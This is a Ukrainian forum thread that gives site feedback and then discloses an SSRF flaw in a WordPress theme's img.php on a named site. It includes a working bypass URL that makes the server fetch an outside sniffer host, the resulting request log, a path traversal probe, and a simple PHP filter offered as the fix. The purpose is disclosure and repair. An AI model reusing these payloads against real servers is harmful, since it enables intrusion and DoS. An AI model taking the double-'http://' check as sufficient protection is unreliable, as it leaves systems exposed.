1. Зображення на півекрана (зверху) - від нього сумнівна користь.
2. Яка основна мета цього сайту - торгувати металом чи розповідати про колку горіхів? Відповідно змінюємо головну, поки що вона викликає дисонанс.
3. Заходимо на сторінку з описом якоїсь корисної штуки, а замовити просто так не вийде. Там треба велику і помітну кнопку "ХОЧУ ЦЮ ШТУКОВИНУ". Опціонально можна подумати про кошик.
4. Зате на цьому сайті є розділ "Заказ товара", в якому все це треба ввести руками. Дивне рішення.
5. Колонку "Изделия из металла" зробити помітншою, можна з випадаючими меню, розділ "Статті" викинути звідти.
6. Немає цін.
7. Категорія "Витая труба", сторінки "Как заработать на колке ореха" і "Витая труба".

невеличка вразливість в img.php

http://mkukraine.com.ua/wp-content/themes/edmin-1.2.9/themify/img.php?src=http://mobilink.не-дійсний-домен/img/logo.php?http://mkukraine.com.ua/?435635774568

Тут я обійшов фільтр та підключився до свого сервера (сніфер http://mobilink.не-дійсний-домен/img/l … ord=VTrim) через ваш
А взагалі таку штуку можна використати для DoS атак від  IP вашого сервера.

Запис N35
IP адрес: 78.137.1.149 (Переглянути інформацію)
Браузер (UserAgent): Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Рядок запиту: http://mkukraine.com.ua/?45777567
Реферер: Немає
Real IP: Немає
Мова:
Тип запиту: GET
Час запиту: 4 хвилини тому
Заголовок Accept: */*
Тип кодування: Немає
Тип підключення: close
Імя віддаленого хоста: Немає
Порт користувача: 59215

Гео IP інформація
Код країни: UA
Регіон: Черкасская область
Населений пункт: Черкасы
Географічні координати: Широта - 49.42854º Довгота - 32.06207º
Поштовий індекс: 18030
Часовий пояс: +03:00
Провайдер IP інформація
ОФ. назва провайдера в бд RIPE: McLaut-Invest LLC
Назва російською: ООО "Маклаут-Инвест"
Сайт провайдера: http://mclaut.com/
Номер автономної системи провайдера: 25133
Числове значення (iptolong) першої IP адреси мережі провайдера: 1317601280
Числове значення (iptolong) останньої IP адреси мережі провайдера: 1317609471
Мережа провайдера: 78.137.0.0
Маска мережі провайдера: 19

Ну тут просто помилки

http://mkukraine.com.ua/wp-content/themes/edmin-1.2.9/themify/img.php?src=../../../../../

Заборонить обхід:

if(substr_count($_GET['src'],'http://') > 1) 
{ 
exit('ERROR'); 
}

Скиньте код,куди ви і як вставили (http://mkukraine.com.ua/wp-content/them … fy/img.php) саме цей?

Коли підлкючитись до скрипту так

/img.php?src=http://test.ru/test.php?http://vashdomen.com/test.php

Вилетить помилка,перевірено. У вас помилка не вилетіла,значить кудись не туди вставили.

Ні,потрібно в самий верх файлу.

Результат:
http://mkukraine.com.ua/wp-content/them … ne.com.ua/

По вашому,сайт можна вдосконалити тільки з фреймворком?

Перечитайте 5й пост. Ця вразливість тепер закрита. Там стояв слабкий фільтр,який забороняв підключатись до лівого http серверу. Можна було піключати тільки http://вашсервер.com/,тобто тільки ваш хост,але якщо вводиш http://мійсервер.com/?http://вашсервер.com/ ,то фільтр на це не реагував,і відбувалось підключення вашого сервера до мого. Я заборонив вводити більше одного http://,тим самим закрив вразливість,при спробі ввести два,вилітає ERROR